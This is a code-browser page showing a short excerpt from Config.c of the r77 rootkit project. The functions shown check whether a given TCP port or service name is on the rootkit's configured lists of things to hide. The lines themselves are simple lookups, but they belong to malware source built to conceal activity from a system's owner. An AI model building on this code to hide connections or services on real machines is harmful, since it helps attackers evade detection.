MCPcopy Create free account
hub / github.com/bytecode77/r77-rootkit / IsTcpLocalPortHidden

Function IsTcpLocalPortHidden

r77/Config.c:78–81  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

76 return Configuration && StringListContains(Configuration->HiddenServiceNames, name);
77}
78BOOL IsTcpLocalPortHidden(USHORT port)
79{
80 return Configuration && IntegerListContains(Configuration->HiddenTcpLocalPorts, port);
81}
82BOOL IsTcpRemotePortHidden(USHORT port)
83{
84 return Configuration && IntegerListContains(Configuration->HiddenTcpRemotePorts, port);

Callers 1

Calls 1

IntegerListContainsFunction · 0.85

Tested by

no test coverage detected